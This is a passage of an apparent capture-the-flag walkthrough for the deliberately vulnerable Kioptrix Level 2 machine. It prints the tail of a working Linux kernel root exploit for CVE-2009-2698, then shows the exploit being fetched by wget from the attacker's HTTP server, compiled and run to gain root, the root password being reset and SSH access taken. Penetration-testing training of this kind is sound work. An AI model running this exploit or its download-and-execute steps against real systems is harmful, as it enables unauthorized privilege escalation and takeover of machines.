		"popl %eax\n");
	return;
}
void *kernel=kernel_code;

int main(int argc, char **argv)
{
	int fd=0;
	char buf[1024];
	struct sockaddr x0x;
	void *zero_page;

	uid=getuid();
	gid=getgid();
	if(uid==0){
		fprintf(stderr,"[-] check ur uid\n");
		return -1;
	}
	if(personality(0xffffffff)==PER_SVR4){
		if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
			perror("[-] mprotect()");
			return -1;
		}
	}
	else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
			perror("[-] mmap()");
			return -1;
	}
	*(unsigned long *)0x0=0x90909090;
	*(char *)0x00000004=0x90; /* +1 */
	*(char *)0x00000005=0xff;
	*(char *)0x00000006=0x25;
	*(unsigned long *)0x00000007=(unsigned long)&kernel;
	*(char *)0x0000000b=0xc3;

	if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){
		perror("[-] socket()");
		return -1;
	}
	x0x.sa_family=AF_UNSPEC;
	memset(x0x.sa_data,0x82,14);
	memset((char *)buf,0,sizeof(buf));
	sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x));
	sendto(fd,buf,1024,0,&x0x,sizeof(x0x));
	if(getuid()==uid){
		printf("[-] exploit failed, try again\n");
		return -1;
	}
	close(fd);
	execl("/bin/sh","sh","-i",NULL);
	return 0;
}

/* eoc */

// milw0rm.com [2009-08-31]                                                                                                                                                                                                        

The usage is given in the header comment of the exploit itself.

3.3.6 Starting an HTTP server on Kali

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_2]
└─# python -m http.server 8086
Serving HTTP on 0.0.0.0 port 8086 (http://0.0.0.0:8086/) ...

The HTTP server is up.

3.3.7 Transferring the exploit to the target

bash-3.00$ cd /tmp
bash-3.00$ ls
bash-3.00$ pwd
/tmp
bash-3.00$ wget http://192.168.1.111:8086/9542.c
--08:10:40--  http://192.168.1.111:8086/9542.c
           => `9542.c'
Connecting to 192.168.1.111:8086... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,535 (2.5K) [text/x-csrc]

    0K ..                                                    100%   10.24 MB/s

08:10:40 (10.24 MB/s) - `9542.c' saved [2535/2535]

bash-3.00$ ls
9542.c

The file was transferred successfully.

3.3.8 Compiling and running the exploit

bash-3.00$ gcc -o 0x82-CVE-2009-2698 9542.c && ./0x82-CVE-2009-2698
9542.c:109:28: warning: no newline at end of file
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)

Root obtained.

3.4 Changing the password

sh-3.00# passwd
New UNIX password: 123456
BAD PASSWORD: it is too simplistic/systematic
Retype new UNIX password: 123456
Changing password for user root.
passwd: all authentication tokens updated successfully.

The root password has been changed to
123456

O(∩_∩)O haha~

3.5 SSH login

Xshell 7 (Build 0063)
Copyright (c) 2020 NetSarang Computer, Inc. All rights reserved.

Type `help' to learn how to use Xshell prompt.
[C:\~]$ ssh root@192.168.1.10


Connecting to 192.168.1.10:22...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.

Last login: Thu Feb  9 22:41:01 2012
/usr/X11R6/bin/xauth:  creating new authority file /root/.Xauthority
[root@kioptrix ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@kioptrix ~]# 

Logged in over SSH successfully.


Summary

This Kioptrix Level #2 walkthrough covered host discovery (nmap/netdiscover), port scanning (nmap/masscan), directory scanning (dirb/dirsearch), netcat, reverse shells and Linux kernel privilege escalation:

  • Host discovery
  • Directory scanning
  • Port scanning
  • netcat listener
  • Reverse shell
  • Linux kernel privilege escalation

